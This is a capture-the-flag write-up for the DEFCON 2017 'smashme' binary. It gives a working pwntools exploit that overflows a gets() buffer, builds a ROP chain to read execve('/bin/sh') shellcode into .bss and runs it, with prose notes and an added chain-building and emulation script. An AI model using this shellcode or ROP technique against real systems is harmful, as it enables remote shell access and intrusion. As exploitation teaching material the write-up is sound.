  • DEFCON 2017 smashme
    Pwnable/CTF 2017. 5. 2. 23:16
    from pwn import *

    # Target service; the binary is loaded locally so pwntools can resolve symbols from it
    p=remote("192.168.146.133",9001)
    elf=ELF("./smashme")

    read_plt=elf.symbols["read"]   # address of read(), taken from the ELF symbol table
    bss=elf.bss()+0x20             # writable scratch area: the shellcode is read() into it and then
                                   # executed, so this only works because the binary runs without NX

    # 27-byte Linux x86-64 execve("/bin/sh") shellcode (shell-storm 806)
    shellcode=b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

    # gadgets in the binary that pop the next stack qword into rsi / rdi / rdx and return
    shell_rsi=0x004015f7
    shell_rdi=0x004014d6
    shell_rdx=0x00441e46

    # must begin with the string the branch compares against; the A's pad up to the saved return address
    # (gets() stops at '\n', so nothing in the payload may contain a 0x0a byte)
    filt=b"Smash me outside, how bout dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

    payload=filt
    payload+=p64(shell_rsi)        # pop rsi ; ret
    payload+=p64(bss)              #   rsi = bss            (buffer for read)
    payload+=p64(shell_rdi)        # pop rdi ; ret
    payload+=p64(0)                #   rdi = 0              (stdin)
    payload+=p64(shell_rdx)        # pop rdx ; ret
    payload+=p64(len(shellcode))   #   rdx = 27             (count)
    payload+=p64(read_plt)         # read(0, bss, 27)
    payload+=p64(bss)              # read() returns straight into the shellcode

    p.sendline(payload)            # first line: overflows the stack via gets()
    p.sendline(shellcode)          # second line: consumed by read() into .bss
    p.interactive()


    Looking at the binary in IDA, there is a stack buffer overflow in the gets() call (gets() has no length limit).


    You will see a single branch: if the input does not start with that string (the one in the filt variable) the program quits; if it matches, the function proceeds normally to leave; ret, and that ret pops the return address we overwrote.


    The shellcode is a 64-bit execve("/bin/sh") syscall shellcode (source: http://shell-storm.org/shellcode/files/shellcode-806.php).


    64-bit argument registers (System V calling convention, which is what the read() call in the chain follows):

    rdi  1st argument
    rsi  2nd argument
    rdx  3rd argument
    rcx  4th argument

    (For the syscall instruction itself the 4th argument goes in r10, not rcx; the chain above only needs the first three.)
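As an added example (not code from the original post), the chain-building step written without pwntools, plus a small emulator that walks the fake stack the way the CPU does after the overwritten ret: each pop gadget consumes the next qword, and when control reaches read() the register state and the address read() will return to are reported, so the chain can be checked before anything is sent. The gadget addresses and shellcode are the ones quoted above; READ_ADDR, BSS and OFFSET are assumed placeholders (in the real exploit they come from elf.symbols["read"], elf.bss()+0x20 and the disassembly).

```python
import struct

# Gadget addresses and shellcode are those quoted in the post. READ_ADDR, BSS and OFFSET
# are assumed placeholders for this example; the real values come from the binary.
POP_RSI_RET = 0x004015f7
POP_RDI_RET = 0x004014d6
POP_RDX_RET = 0x00441e46
READ_ADDR = 0x0043e000          # assumed: address of read() from the symbol table
BSS = 0x006c0040                # assumed: elf.bss() + 0x20
OFFSET = 72                     # assumed: bytes from buffer start to the saved return address
PREFIX = b"Smash me outside, how bout d"   # string the branch compares against

# 27-byte Linux x86-64 execve("/bin/sh") shellcode (shell-storm 806)
SHELLCODE = (b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb"
             b"\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05")

# "pop <reg> ; ret" gadgets: address -> register the next stack qword lands in
POP_GADGETS = {POP_RSI_RET: "rsi", POP_RDI_RET: "rdi", POP_RDX_RET: "rdx"}


def p64(value):
    """Little-endian 64-bit pack, same as pwntools' p64 on amd64."""
    return struct.pack("<Q", value)


def build_chain(dest, count):
    """ROP chain that calls read(0, dest, count) and then returns into dest."""
    return b"".join([
        p64(POP_RSI_RET), p64(dest),     # rsi = destination buffer
        p64(POP_RDI_RET), p64(0),        # rdi = stdin
        p64(POP_RDX_RET), p64(count),    # rdx = number of bytes to read
        p64(READ_ADDR),                  # read(rdi, rsi, rdx)
        p64(dest),                       # read()'s own ret lands on the shellcode
    ])


def build_payload(offset=OFFSET):
    """Prefix that satisfies the branch, padded with 'A' up to the return address, then the chain."""
    padding = PREFIX.ljust(offset, b"A")
    if len(padding) != offset:
        raise ValueError("prefix is longer than the offset to the return address")
    return padding + build_chain(BSS, len(SHELLCODE))


def gets_safe(payload):
    """gets() stops at the first newline, so a 0x0a byte anywhere would truncate the chain."""
    return b"\n" not in payload


def emulate_chain(chain):
    """Walk the fake stack: pop gadgets consume one qword each; stop when read() is reached.

    Returns (registers set so far, address read() will return to).
    """
    words = [struct.unpack("<Q", chain[i:i + 8])[0] for i in range(0, len(chain), 8)]
    regs = {}
    pc = 0
    while pc < len(words):
        target = words[pc]
        pc += 1
        if target in POP_GADGETS:
            regs[POP_GADGETS[target]] = words[pc]   # the pop takes the next qword
            pc += 1                                 # the gadget's ret takes the one after
        elif target == READ_ADDR:
            return regs, words[pc]                  # read() returns via its own ret
        else:
            raise ValueError("chain jumps to unknown address 0x%x" % target)
    raise ValueError("chain ended before reaching read()")


def verify_payload(payload, offset=OFFSET):
    """Emulate only the part of the payload that overwrites the saved return address onward."""
    return emulate_chain(payload[offset:])


if __name__ == "__main__":
    payload = build_payload()
    print("gets-safe:", gets_safe(payload))
    print("registers at read(), return target:", verify_payload(payload))
```

If the emulator reports anything other than rdi=0, rsi=BSS, rdx=27 and a return target of BSS, the gadget order or a pop count in the chain is wrong. The newline check matters because the first line goes through gets(), not read(); a gadget or target address containing 0x0a cannot be delivered this way. Jumping into .bss still requires the page to be executable, which is why this approach depends on NX being off for the target.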
